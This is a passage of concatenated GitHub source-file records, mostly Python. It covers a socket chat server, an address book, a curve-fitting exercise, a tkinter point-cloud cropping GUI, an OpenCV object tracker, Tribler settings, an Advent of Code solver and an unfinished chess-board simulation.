self.outputs:\n\t\t\t\tself.outputs.append(sock)\n\t\t\tif self.verbose:\n\t\t\t\tprint('Received msg',packet,'from id',sock_id)\n\t\t\treturn\n\t\t#treats \"MSG\" messages\n\t\telif msg_int_type == 5:\n\t\t\tfor i in self.mapping:\n\t\t\t\tif i['id'] == orig_int:\n\t\t\t\t\tif i['sock'] is not sock:\n\t\t\t\t\t\treturn\n\t\t\tn_size = sock.recv(2)\n\t\t\tn_int = struct.unpack('!H',n_size)[0]\n\t\t\treceived_msg = sock.recv(n_int)\n\t\t\tpacket += n_size + received_msg\n\t\t\t#forwarding of messages\n\t\t\tif dest_int != 0:\n\t\t\t\tdest_sock = None\n\t\t\t\tfor i in self.mapping:\n\t\t\t\t\tif i['id'] == dest_int:\n\t\t\t\t\t\tdest_sock = i['sock']\n\t\t\t\tif dest_sock:\n\t\t\t\t\tself.message_queues[dest_sock].put(packet)\n\t\t\t\t\t# sock.setblocking(1)\n\t\t\t\t\t# sock.settimeout(5)\n\t\t\t\t\tif dest_sock not in self.outputs:\n\t\t\t\t\t\tself.outputs.append(dest_sock)\n\t\t\t\t\tok_frame = self.create_message('',1,orig_int,seq_int)\n\t\t\t\t\tself.message_queues[sock].put(ok_frame)\n\t\t\t\t\tif sock not in self.outputs:\n\t\t\t\t\t\tself.outputs.append(sock)\n\t\t\t\t\tif self.verbose:\n\t\t\t\t\t\tprint('Received msg',packet,'from id',sock_id)\n\t\t\t\t\treturn \n\t\t\t\telse:\n\t\t\t\t\terror_frame = self.create_message('',2,orig_int,seq_int)\n\t\t\t\t\tself.message_queues[sock].put(error_frame)\n\t\t\t\t\tif sock not in self.outputs:\n\t\t\t\t\t\tself.outputs.append(sock)\n\t\t\t\t\tif self.verbose:\n\t\t\t\t\t\tprint('Received msg',packet,'from id', sock_id)\n\t\t\t\t\treturn\n\t\t\t#Broadcast\n\t\t\telse:\n\t\t\t\tif self.verbose:\n\t\t\t\t\tprint('Received msg',packet,'from id',sock_id)\n\t\t\t\tok_frame = self.create_message('',1,orig_int,seq_int)\n\t\t\t\tself.message_queues[sock].put(ok_frame)\n\t\t\t\tif sock not in self.outputs:\n\t\t\t\t\tself.outputs.append(sock)\n\t\t\t\tfor i in self.mapping:\n\t\t\t\t\tdest_sock = None\n\t\t\t\t\tif i['id'] != self.SERVER_ID and i['id'] != orig_int:\n\t\t\t\t\t\tdest_sock = 
i['sock']\n\t\t\t\t\tif dest_sock:\n\t\t\t\t\t\tself.message_queues[dest_sock].put(packet)\n\t\t\t\t\t\tif dest_sock not in self.outputs:\n\t\t\t\t\t\t\tself.outputs.append(dest_sock)\n\t\t\t\treturn\n\n\t\t#treats \"CREQ\" messages\n\t\telif msg_int_type == 6:\n\t\t\tlist_frame = self.create_message('',7,orig_int,seq_int)\n\t\t\tself.message_queues[sock].put(list_frame)\n\t\t\tif sock not in self.outputs:\n\t\t\t\tself.outputs.append(sock)\n\t\t#treats \"FLW\" messages\n\t\telif msg_int_type == 4:\n\t\t\tself.freed_ids.append(sock_id)\n\t\t\tself.user_count -= 1\n\t\t\tfor i in self.mapping[:]:\n\t\t\t\tif i['id'] == sock_id:\n\t\t\t\t\tself.mapping.remove(i)\n\t\t\tok_frame = self.create_message('',1,orig_int,seq_int)\n\t\t\tself.message_queues[sock].put(ok_frame)\n\t\t\tif sock not in self.outputs:\n\t\t\t\tself.outputs.append(sock)\n\t\tif self.verbose:\n\t\t\tprint('Received msg',packet,'from id',sock_id)\n\t\treturn\n\n\tdef run(self):\n\t\tS_ADDR = ('',self.PORT)\n\t\tMAX_CON = 65534\n\t\tserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\t\n\t\tserver.setblocking(0)\n\n\t\tserver.bind(S_ADDR)\n\t\tserver.listen(MAX_CON)\t\n\n\t\t#messages lists\n\t\tself.inputs = [ server ]\n\t\tself.outputs = []\n\t\tself.message_queues = {}\n\n\t\tself.mapping.append({'sock':server,'id':self.SERVER_ID})\n\t\ttry:\n\t\t\twhile self.inputs:\n\t\t\t\t# time.sleep(5)\n\t\t\t\treadable, writable, exceptional = select.select(self.inputs,self.outputs,self.inputs)\n\t\t\t\t#Handling inputs\t\n\t\t\t\tfor s in readable:\n\t\t\t\t\tif s is server:\n\t\t\t\t\t\t#Accepts new connections\n\t\t\t\t\t\tconnection, addr = s.accept()\n\t\t\t\t\t\tconnection.setblocking(0)\n\t\t\t\t\t\t# connection.settimeout(1)\n\t\t\t\t\t\tself.inputs.append(connection)\n\t\t\t\t\t\tself.mapping.append({'sock':connection,'id':0})\n\t\t\t\t\t\t#creates queue for message\n\t\t\t\t\t\tself.message_queues[connection] = queue.Queue()\n\t\t\t\t\telse:\n\t\t\t\t\t\t#Receives data\n\t\t\t\t\t\taswr = self.receive_message(s)\n\t\t\t\t#Handling outputs\n\t\t\t\tfor s in writable:\t\n\t\t\t\t\ttry:\n\t\t\t\t\t\tnext_msg = self.message_queues[s].get_nowait()\n\t\t\t\t\texcept queue.Empty:\n\t\t\t\t\t\tself.outputs.remove(s)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.verbose:\n\t\t\t\t\t\t\tfor i in self.mapping:\n\t\t\t\t\t\t\t\tif s == i['sock']:\n\t\t\t\t\t\t\t\t\tsock_id = i['id']\n\t\t\t\t\t\t\tprint('sending',next_msg,'to id',sock_id)\n\t\t\t\t\t\ts.send(next_msg)\n\t\t\t\t\t\t\t\n\t\t\t\tfor s in exceptional:\n\t\t\t\t\tself.inputs.remove(s)\n\t\t\t\t\tif s in outputs:\n\t\t\t\t\t\tself.outputs.remove(s)\n\t\t\t\t\ts.close()\n\t\t\n\t\t\t\t\tdel self.message_queues[s]\n\t\texcept socket.timeout:\n\t\t\tself.freed_ids.append(sock_id)\n\t\t\tself.user_count -= 1\n\t\t\tfor i in self.mapping[:]:\n\t\t\t\tif i['id'] == sock_id:\n\t\t\t\t\tself.mapping.remove(i)\n\nif __name__ == '__main__':\n\targc = len(sys.argv)\n\tif argc == 3:\n\t\tif sys.argv[2] == '-v':\n\t\t\tserver = chat_server(int(sys.argv[1]),verbose=True)\n\t\telse:\n\t\t\tprint('Wrong arg')\n\t\t\tsys.exit(0)\n\telif argc == 2:\n\t\tserver = chat_server(int(sys.argv[1]))\n\telse:\n\t\tprint('Wrong arg format')\n\t\tsys.exit(0)\n\tserver.run()\n","repo_name":"giovannitgl/py_chat","sub_path":"chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":7650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73727175685","text":"from collections import UserDict, UserList\nimport pickle\nfrom faker 
import Faker\nfrom normalize import normalize\nfrom datetime import datetime, timedelta\nfrom itertools import islice\n\n\nclass Field:\n def __init__(self, value) -> None:\n self.value = value\n\n def __str__(self) -> str:\n return self.value\n\n def __repr__(self) -> str:\n return str(self)\n\n\nclass Name(Field):\n ...\n\n\nclass IncorrectData(Exception):\n ...\n\n\nclass Iteraror(UserList):\n def __init__(self, list):\n self.list = list\n\n\nclass Phone(Field):\n @property\n def value(self):\n return self.__value\n\n @value.setter\n def value(self, value):\n if 7 <= len(value) <= 13:\n self.__value = value\n else:\n raise IncorrectData(\"Number to shot or to long\")\n\n\nclass Birthday(Field):\n @property\n def value(self):\n return self.__value\n\n @value.setter\n def value(self, value: str) -> str:\n test = value.split(\"-\")\n if (\n 0 < int(test[0]) <= 31\n and 0 < int(test[1]) <= 12\n and (datetime.now() - timedelta(days=54750)).year\n < int(test[2])\n < (datetime.now() + timedelta(days=54750)).year\n ):\n self.__value = value\n\n else:\n raise IncorrectData(\n \"Wrong Date Format or date out of range > Need:dd-mm-YYYY |example: 01-01-2001\"\n )\n\n\nclass Record:\n def __init__(\n self, name: Name, phone: Phone = None, birthday: Birthday = None\n ) -> None:\n self.birthday = birthday\n self.name = name\n self.phones = []\n if phone:\n self.phones.append(phone)\n\n def days_to_birthday(self) -> str:\n input_data = self.birthday\n current_data = datetime.now()\n input_data = datetime.strptime(str(self.birthday), \"%d-%m-%Y\")\n old = current_data.year - input_data.year\n change_year = input_data.replace(year=current_data.year)\n left_to_bd = change_year - current_data\n if left_to_bd.days < 0:\n left_to_bd += timedelta(days=365)\n return f\"{left_to_bd.days} days remained until the birthday.Will be {old} years old\"\n\n def add_phone(self, phone: Phone) -> str:\n if phone.value not in [p.value for p in self.phones]:\n self.phones.append(phone)\n return f\"phone {phone} add to contact {self.name}\"\n return f\"{phone} present in phones of contact {self.name}\"\n\n def change_phone(self, old_phone, new_phone) -> str:\n for idx, p in enumerate(self.phones):\n if old_phone.value == p.value:\n self.phones[idx] = new_phone\n\n return f\"old phone {old_phone} change to {new_phone}\"\n return f\"{old_phone} not present in phones of contact {self.name}\"\n\n def del_phone(self, phone: Phone) -> str:\n for p in self.phones:\n if p.value == phone.value:\n self.phones.remove(p)\n\n return f\"number {phone} has been deleted in contact {self.name}\"\n\n return f\"{phone} not present in phones of contact {self.name}\"\n\n def __str__(self) -> str:\n return f\"{self.name}: {', '.join(str(p) for p in self.phones)} Bd |{self.birthday if self.birthday else f'Not record'}|\"\n\n\nclass AdressBook(UserDict):\n def search_contacts(self, find_string: str) -> list:\n find_list = [\n str(val) for val in self.values() if find_string.lower().strip() in str(val)\n ]\n return find_list\n\n def iterator(self, n: int) -> Iteraror:\n value_list = [value for value in self.values()]\n start = 0\n finish = n\n gen_list = []\n while start < len(value_list):\n gen = islice(value_list, start, finish)\n start += n\n finish = start + n\n gen_list.append(gen)\n iterator = Iteraror(gen_list)\n return iterator\n\n def load_phone_book(self) -> str:\n with open(\"phone_book.bin\", \"rb\") as file:\n self.data = pickle.load(file)\n return f\"Phone book has been loaded\"\n\n def clear_phone_book(self) -> str:\n self.clear()\n 
return \"Phone book is clear now\"\n\n def add_record(self, record: Record) -> str:\n self.data[str(record.name)] = record\n return f\"Contact {record} add success\"\n\n def del_record(self, rec: Record) -> str:\n del_rec = self.pop(rec.name.value)\n return f\"contact {del_rec} has been deleted\"\n\n def __str__(self) -> str:\n return \"\\n\".join(str(r) for r in self.data.values())\n","repo_name":"Roll1ngo/HomeWorks_PythonCore_archive","sub_path":"HW_11_12/ab_classes.py","file_name":"ab_classes.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7418683721","text":"import numpy as np\r\nimport pandas as pd\r\nfrom scipy.optimize import curve_fit\r\n\r\ndef f(x, a, b):\r\n return a*b**x\r\n\r\ndata = pd.read_csv(\"populasjon2.csv\")\r\n\r\nparam, info = curve_fit(f, data.maaned, data.populasjon)\r\na=param[0]\r\nb=param[1]\r\n\r\nprint(f\"Denne modelen gir f(x)={a:.2f}*{b:.2f}^x\")\r\nx_verdier=np.linspace(0,len(data.maaned),100)\r\n\r\ny=(f(50, *param)) #Verdi for f(50)\r\n \r\npopulasjon = data.populasjon.tolist()\r\navvik=(populasjon[50]-y)\r\n\r\nprint(f\"Avviket mellom modellen og virkeligheten for x=50 er {avvik:.2f}\")","repo_name":"kaareskokebok/losninger_programmering","sub_path":"kap13/13_opg12B.py","file_name":"13_opg12B.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32464609291","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nimport Detection_Model\n\n\ndef browse_file(file_entry):\n # Function to browse and select a file\n window.update() # Update the main window to fix focus issues\n file_path = filedialog.askopenfilename(parent=window, title=\"Select File\", filetypes=((\"All Files\", \"*.*\"),))\n file_entry.delete(0, tk.END)\n file_entry.insert(0, file_path)\n\ndef upload_files():\n # Function to handle the \"Process\" button click event\n file_paths = [entry.get() for entry in file_entries]\n upload_button.config(state=tk.DISABLED) # Disable the \"Process\" button\n class_data, image_dimensions, image_original_size = Detection_Model.receive_file(file_paths) # Get the class_data after processing\n display_class_selection(class_data, image_dimensions, image_original_size) # Display the class_data for user selection\n\ndef display_class_selection(class_data,image_dimensions, image_original_size):\n # Function to display the class selection interface\n class_names = list(class_data.keys())\n class_selection_window = tk.Toplevel(window)\n class_selection_window.title(\"Select Class\")\n class_selection_window.geometry(\"400x400\") # Set the size of the class selection window\n selected_classes = []\n\n def update_selected_classes():\n # Function to handle the \"Submit\" button click event\n process_selected_classes(selected_classes,class_data, image_dimensions, image_original_size)\n class_selection_window.destroy()\n inform_user()\n \n submit_button = tk.Button(class_selection_window, text=\"Submit\", command=update_selected_classes)\n submit_button.pack(pady=10)\n\n def toggle_class(name):\n # Function to handle the check button toggle event\n if name in selected_classes:\n selected_classes.remove(name)\n else:\n selected_classes.append(name)\n\n for potential_class_name in class_names:\n check_button = tk.Checkbutton(class_selection_window, text=potential_class_name, command=lambda name=potential_class_name: 
toggle_class(name))\n check_button.pack(anchor=tk.W)\n\ndef process_selected_classes(selected_classes,class_data, image_dimensions, image_original_size):\n # Function to process the selected classes\n keys_list_set = set(selected_classes)\n keys_to_remove = []\n for key in class_data.keys():\n if key not in keys_list_set:\n keys_to_remove.append(key)\n for key in keys_to_remove:\n del class_data[key]\n \n Detection_Model.cropping(class_data, image_dimensions, image_original_size) # Perform further processing in Detection_Model.py\n\ndef inform_user():\n # Function to inform the user about the completion of the model running\n messagebox.showinfo(\"Process Completed\", \"Model running is completed!\") # Display a message box to inform the user\n window.destroy() # Close the Point Cloud Cropping interface\n\n# Create the main window\nwindow = tk.Tk()\nwindow.geometry(\"750x400\")\nwindow.title(\"Point Cloud Cropping\")\n\n# Create file entry fields\nfile_entries = []\nfile_labels = [\"Point Cloud\", \"Orthophoto\", \"TFW File\", \"XYZ File\"]\n\nfor i in range(4):\n file_frame = tk.Frame(window)\n file_frame.pack()\n label = tk.Label(file_frame, text=f\"{file_labels[i]}: \")\n label.pack(side=tk.LEFT)\n entry = tk.Entry(file_frame, width=50)\n entry.pack(side=tk.LEFT)\n browse_button = tk.Button(file_frame, text=\"Browse\", command=lambda entry=entry: browse_file(entry))\n browse_button.pack(side=tk.LEFT)\n file_entries.append(entry)\n\n# Create upload button\nupload_button = tk.Button(window, text=\"Process\", command=upload_files)\nupload_button.pack()\n\n# Run the GUI event loop\nwindow.mainloop()","repo_name":"hahaBlizzard/Main-Code","sub_path":"user_interface.py","file_name":"user_interface.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31477486889","text":"#!/usr/bin/env python\n\n#this class is based on tutorial code from the following link:\n#https://www.pyimagesearch.com/2018/07/30/opencv-object-tracking/\n\nimport sys\ntry:\n sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')\n sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')\nexcept Exception as e:\n print(\"no ros kinetic found in path\")\n\nimport numpy as np\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\n\nimport imutils #pip install --upgrade imutils\nimport cv2\nimport time\nimport atexit\nimport rospy\nimport os\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom camera_stuff import detector\n\n\nclass Tracker:\n #\n OPENCV_OBJECT_TRACKERS = {\n \"csrt\": cv2.TrackerCSRT_create, #want accuracy and tolerate lower fps\n \"kcf\": cv2.TrackerKCF_create, #happy medimum of fps vs accuracy\n \"boosting\": cv2.TrackerBoosting_create,\n \"mil\": cv2.TrackerMIL_create,\n \"tld\": cv2.TrackerTLD_create, #author did not recommend\n \"medianflow\": cv2.TrackerMedianFlow_create,\n \"mosse\": cv2.TrackerMOSSE_create #fast tracking(more fps), less accurate\n }\n\n def __init__(self, initBB=None, tracker_type='kcf', width_scale=640, src=0, handleTarget=False, attempt_autoinit=50):\n #take first camera it can\n\n self.vs = VideoStream(src=src).start()\n\n time.sleep(1.0)\n self.width_scale = width_scale\n #initialized after you get the frame\n self.dims = None\n self.updateDims()\n\n self.attempt_autoinit = attempt_autoinit\n self.tracker_type = tracker_type\n\n self.initTracker(initBB)\n\n self.box = self.initBB\n self.success = True\n\n if 
handleTarget:\n #define bounds where robot is located\n print(\"Specify where robot exists\")\n self.robotBound = self.specifyBoundingBox()\n\n\n #define target Generation box\n\n print(\"Specify where targets should be generated in image\")\n self.targetRange = self.specifyBoundingBox()\n\n #specify Target\n self.targ_psn = np.array([0, 0])\n self.generateTarget()\n else:\n self.handleTarget = handleTarget\n\n #fps information\n self.fps = FPS()\n self.fps.start()\n\n #clean up\n atexit.register(self.shutdown)\n\n def init_box(self):\n for _ in range(self.attempt_autoinit):\n frame = self.readFrame()\n success, self.initBB = detector.detect(frame)\n if success:\n break\n time.sleep(0.05)\n success = False\n return success\n\n def initTracker(self, initBB=None):\n #Set-up Tracker\n if initBB is None:\n success = self.init_box()\n #initialize tracker bounding box if unspecified\n if not self.init_box():\n self.initBB = self.specifyBoundingBox()\n else:\n self.initBB = initBB\n frame = self.readFrame()\n self.curr_frame = frame\n self.tracker = self.OPENCV_OBJECT_TRACKERS[self.tracker_type]()\n self.tracker.init(frame, self.initBB)\n\n def specifyBoundingBox(self):\n frame = self.readFrame()\n boundingBox = cv2.selectROI(\"Frame\", frame,fromCenter=False,\n showCrosshair=True)\n return boundingBox\n\n def inRobotBox(self, v_w, v_h):\n (x, y, w, h) = [int(v) for v in self.robotBound]\n inWidth = x <= v_w and v_w <= x + w\n inHeight = y <= v_h and v_h <= y + h\n return inWidth and inHeight\n\n def getTargetRange(self):\n (w_low,h_low, w, h) = [int(v) for v in self.targetRange]\n w_high = w_low + w\n h_high = h_low + h\n return w_low, w_high, h_low, h_high\n\n def generateTarget(self):\n if self.handleTarget:\n w_low, w_high, h_low, h_high = self.getTargetRange()\n targ_h = np.random.uniform(h_low, h_high)\n targ_w = np.random.uniform(w_low, w_high)\n while self.inRobotBox(targ_w, targ_h):\n #generate target outside bounding box\n targ_h = np.random.uniform(h_low, h_high)\n targ_w = np.random.uniform(w_low, w_high)\n\n self.targ_psn = np.array([targ_h, targ_w])\n else:\n self.targ_psn = np.array([0.0, 0.0])\n\n def resetTracker(self):\n self.box = self.initBB\n self.initTracker()\n\n def getTarget(self):\n return self.targ_psn\n\n def readFrame(self):\n frame = self.vs.read()\n frame = imutils.resize(frame, width=self.width_scale)\n return frame\n\n def updateDims(self):\n frame = self.readFrame()\n (H, W) = frame.shape[:2]\n self.dims = (H, W)\n\n def getDims(self):\n return self.dims\n\n def setWidthScale(self, width_scale):\n self.width_scale = width_scale\n self.updateDims()\n\n def getSuccess(self):\n return self.success\n\n def updateTracker(self):\n frame = self.readFrame()\n (self.success, self.box) = self.tracker.update(frame)\n self.curr_frame = frame\n\n #collect FPS information\n self.fps.update()\n self.fps.stop()\n\n return self.success\n\n def calcReward(self):\n center = self.getTrackerCenter()\n #it's backwards\n center = np.array([center[1], center[0]])\n diff = self.targ_psn - center\n return -np.linalg.norm(diff, 2)\n\n def getTrackerCenter(self):\n (x, y, w, h) = [int(v) for v in self.box]\n return np.array([x + w / 2, y + h / 2])\n\n def getInfo(self):\n info = [\n (\"Tracker\", self.tracker_type),\n (\"Success\", \"Yes\" if self.success else \"No\"),\n (\"FPS\", \"{:.2f}\".format(self.fps.fps())),\n (\"Reward\", \"{:.2f}\".format(self.calcReward() if self.handleTarget else 0.0))\n ]\n return info\n\n def render(self):\n #Visualize tracking box\n (x, y, w, h) = [int(v) for 
v in self.box]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (0, 255, 0), 2)\n center = self.getTrackerCenter()\n cv2.circle(self.curr_frame, (center[0], center[1]), radius=5, color=(0, 255,0),thickness=-1)\n\n if self.handleTarget:\n #visualize center of box\n targ_h = int(self.targ_psn[0])\n targ_w = int(self.targ_psn[1])\n cv2.circle(self.curr_frame, (targ_w, targ_h), radius=5, color=(0, 255,0),thickness=-1)\n\n #Visualize area no target should appear\n (x, y, w, h) = [int(v) for v in self.robotBound]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (0, 0, 255), 2)\n\n #Visualize area targets generated \n (x, y, w, h) = [int(v) for v in self.targetRange]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (255, 0, 0), 2)\n\n if self.handleTarget:\n #visualize center of box\n targ_h = int(self.targ_psn[0])\n targ_w = int(self.targ_psn[1])\n cv2.circle(self.curr_frame, (targ_w, targ_h), radius=5, color=(0, 255,0),thickness=-1)\n\n #Visualize area no target should appear\n (x, y, w, h) = [int(v) for v in self.robotBound]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (0, 0, 255), 2)\n\n #Visualize area targets generated\n (x, y, w, h) = [int(v) for v in self.targetRange]\n cv2.rectangle(self.curr_frame, (x, y), (x + w, y + h),\n (255, 0, 0), 2)\n\n info = self.getInfo()\n # loop over the info tuples and draw them on our frame\n for (i, (k, v)) in enumerate(info):\n text = \"{}: {}\".format(k, v)\n cv2.putText(self.curr_frame, text, (10, self.dims[0] - ((i * 20) + 20)),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\n\n cv2.imshow(\"Frame\", self.curr_frame)\n #if you don't call waitKey the screen immediately disappears\n key = cv2.waitKey(1) & 0xFF\n\n return self.curr_frame\n\n\n def shutdown(self):\n print(\"shut down the show, kill everything\")\n #clean up video stream and all that\n #kill video stream\n self.vs.stop()\n #shutdown any openCV windows\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n import argparse\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-v\", \"--video\", type=str,\n help=\"path to input video file\")\n ap.add_argument(\"-t\", \"--tracker\", type=str, default=\"kcf\",\n help=\"OpenCV object tracker type\")\n ap.add_argument(\"-record\", \"-r\", action=\"store_true\",default=False,\n help=\"flag to record video\")\n ap.add_argument(\"-genTarg\", action=\"store_true\",default=False,\n help=\"flag to keep generating random targets\")\n ap.add_argument(\"-source\", \"-s\", type=int, default=1,\n help=\"specify camera source\")\n args = vars(ap.parse_args())\n print(args.keys())\n\n\n # extract the OpenCV version info\n (major, minor) = cv2.__version__.split(\".\")[:2]\n print(major, minor)\n cam_rew = Tracker(src=args[\"source\"], tracker_type=args[\"tracker\"])\n dims = cam_rew.getDims()\n writer = None\n if args[\"record\"]:\n forcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n\n writer = cv2.VideoWriter(\"example.avi\", forcc, 20,\n (int(dims[1]), int(dims[0])), True)\n while True:\n success = cam_rew.updateTracker()\n frame = cam_rew.render()\n if args[\"genTarg\"]:\n cam_rew.generateTarget()\n if writer is not None:\n writer.write(frame)\n if not success:\n break\n\n if writer is not None:\n writer.release()\n cv2.destroyAllWindows()\n\n","repo_name":"Mi-Przystupa/neural_jacobian_estimation","sub_path":"src/environments/Tracker.py","file_name":"Tracker.py","file_ext":"py","file_size_in_byte":9878,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} 
+{"seq_id":"27067398693","text":"from pydantic import validator\n\nfrom tribler.core.config.tribler_config_section import TriblerConfigSection\n\n\n# pylint: disable=no-self-argument\nclass ResourceMonitorSettings(TriblerConfigSection):\n enabled: bool = True\n cpu_priority: int = 1\n poll_interval: int = 5\n history_size: int = 20\n\n @validator('cpu_priority')\n def validate_cpu_priority(cls, v):\n assert 0 <= v <= 5, 'Cpu priority must be in range [0..5]'\n return v\n\n @validator('poll_interval', 'history_size')\n def validate_not_less_than_one(cls, v):\n assert v >= 1, 'Value must be not less than 1'\n return v\n","repo_name":"Tribler/tribler","sub_path":"src/tribler/core/components/resource_monitor/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":4368,"dataset":"github-code","pt":"99"} +{"seq_id":"40346989813","text":"import re\nfrom collections import deque\nfrom sys import argv\nfrom typing import List, Dict, Set, Tuple, Optional\n\n\nclass Elf:\n def __init__(self, elf_id: int, base_time: int):\n self.elf_id = elf_id\n self.base_time = base_time\n self.current_step = None\n self.finished_steps = []\n self.time_remaining = 0\n\n def __repr__(self):\n return \"{} @ {}/{} -> {}\".format(self.current_step,\n self.time_remaining,\n self.base_time,\n ''.join(self.finished_steps))\n\n def assign_step(self, step: str):\n self.current_step = step\n self.time_remaining = ord(step) - 64 + self.base_time\n\n def complete_step(self) -> Tuple[str, int]:\n finished = self.current_step\n time_taken = self.time_remaining\n self.finished_steps.append(finished)\n self.current_step = None\n self.time_remaining = 0\n return finished, time_taken\n\n def elapse(self, duration: int):\n self.time_remaining -= duration\n\n\ndef comprehend_instructions(step_list: List[str], part_num: int,\n num_elves: int=5, base_time: int=60):\n dependencies = _determine_dependencies(step_list)\n new_ready = {let for let, deps in dependencies.items()\n if not deps['requires']}\n ready = deque(sorted(new_ready))\n\n if part_num == 1:\n\n all_finished = []\n while len(all_finished) < len(dependencies):\n all_finished.append(ready.popleft())\n\n new_ready = (set(ready) |\n _find_new_ready(dependencies,\n all_finished,\n ready))\n ready = deque(sorted(new_ready))\n\n print(\"ORDERED STEPS:\", ''.join(all_finished))\n\n elif part_num == 2:\n free_elves = deque([Elf(i, base_time) for i in range(num_elves)])\n busy_elves = deque()\n in_progress = set()\n all_finished = []\n total_time = 0\n\n while len(all_finished) < len(dependencies):\n\n while len(free_elves) and len(ready):\n # Assign steps to free elves\n cur_elf = free_elves.popleft()\n next_step = ready.popleft()\n cur_elf.assign_step(next_step)\n in_progress.add(next_step)\n busy_elves.append(cur_elf)\n\n # Find next elf closest to finishing and finish its work\n busy_elves = deque(sorted(busy_elves, key=lambda elf: elf.time_remaining))\n finished_elf = busy_elves.popleft() # type: Elf\n finished_step, time_elapsed = finished_elf.complete_step()\n\n # Update finished steps and elves still working\n all_finished.append(finished_step)\n total_time += time_elapsed\n for busy_elf in busy_elves:\n busy_elf.elapse(time_elapsed)\n\n # Move finished elf back to free and order by elf id\n free_elves.append(finished_elf)\n free_elves = deque(sorted(free_elves, key=lambda elf: elf.elf_id))\n\n new_ready = (set(ready) |\n _find_new_ready(dependencies,\n all_finished,\n ready, in_progress))\n 
ready = deque(sorted(new_ready))\n\n print(\"TOTAL TIME:\", total_time)\n\n\ndef _find_new_ready(dependencies: Dict, all_finished: List[str], ready: deque,\n in_progress: Optional[Set[str]]=None) -> Set[str]:\n finished_set = set(all_finished)\n in_progress = in_progress or set()\n seen = set(ready) | finished_set | in_progress\n return {let for let, deps in dependencies.items()\n if (not deps['requires'] - finished_set)\n and (let not in seen)}\n\n\ndef _determine_dependencies(steps: List[str]) -> Dict:\n dependencies = {}\n for step in steps:\n required, dependent = re.findall(r' ([A-Z]) ', step)\n # Set permittance relationship\n try:\n dependencies[required]['permits'].add(dependent)\n except KeyError:\n dependencies[required] = {'permits': {dependent},\n 'requires': set()}\n # Set requirement relationship\n try:\n dependencies[dependent]['requires'].add(required)\n except KeyError:\n dependencies[dependent] = {'requires': {required},\n 'permits': set()}\n return dependencies\n\n\nif __name__ == '__main__':\n data_file = argv[1]\n data_lines = [l.strip() for l in open(data_file, 'r').readlines()]\n part = int(argv[2])\n kwargs = {'step_list': data_lines, 'part_num': part}\n if len(argv) > 3:\n kwargs['num_elves'] = int(argv[3])\n if len(argv) > 4:\n kwargs['base_time'] = int(argv[4])\n\n comprehend_instructions(**kwargs)\n","repo_name":"ericbgarnick/AOC","sub_path":"y2018/day07/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":4963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"71547922244","text":"N, K = map(int, input().split())\n# 처음 해보는 연장된 체스판 만들어보기\nchess_pan = []\nfor _ in range(N):\n temp = list(map(int, input().split()))\n chess_pan.append([2] + temp + [2])\nchess_pan = [([2] * (N + 2))] + chess_pan + [([2] * (N + 2))]\nprint(*chess_pan, sep='\\n')\n# 체스 정보 저장\nchess_position_info = [0] * (K + 1)\nfor i in range(1, K + 1):\n chess_position_info[i] = list(map(int, input().split()))\nprint('posi',chess_position_info)\ncnt = 0\nD = [0, (0,1), (0,-1),(-1,0),(1,0)]\n\nchess_ground = [ [0] * (N + 2) for _ in range(N + 2) ]\nfor i in range(1, K + 1):\n chess = chess_position_info[i]\n y = chess[0]\n x = chess[1]\n direction = chess[2]\n # 방향 정보는 저장 안해도 되겠는데?\n chess_ground[y][x] = [i]\n# print(*chess_ground, sep='\\n')\n\ndef change_d(d):\n if d == 4:\n return 3\n elif d == 3:\n return 4\n elif d == 2:\n return 1\n elif d == 1:\n return 2\n\nflag = False\n# 본격적인 이동 시작.\nwhile cnt < 10:\n cnt += 1\n print(\"cnt\", cnt)\n print(*chess_ground, sep='\\n')\n print('position',chess_position_info)\n for i in range(1, K + 1):\n chess = chess_position_info[i]\n y = chess[0]\n x = chess[1]\n d = chess[2]\n # 슬라이싱 이런거... ㅠㅠ\n if len(chess_ground[y][x]) == 1:\n existed = chess_ground[y][x][:]\n remained = 0\n else:\n for j in range(len(chess_ground[y][x])):\n if chess_ground[y][x][j] == i:\n existed = chess_ground[y][x][:(j+1)]\n remained = chess_ground[y][x][(j+1):]\n if remained == []:\n remained = 0\n moved_y = y + D[d][0]\n moved_x = x + D[d][1]\n\n chess_ground[y][x] = remained\n # 파란색일때\n if chess_pan[moved_y][moved_x] == 2:\n d = change_d(d)\n moved_y = y + D[d][0]\n moved_x = x + D[d][1]\n # 파란색이면 포지션값 무적권 갱신은 해줘야지\n chess_position_info[i][2] = d\n # 맞은편도 파란색일때\n if chess_pan[moved_y][moved_x] == 2:\n moved_y = y\n moved_x = x\n # 체스판에 배정. 
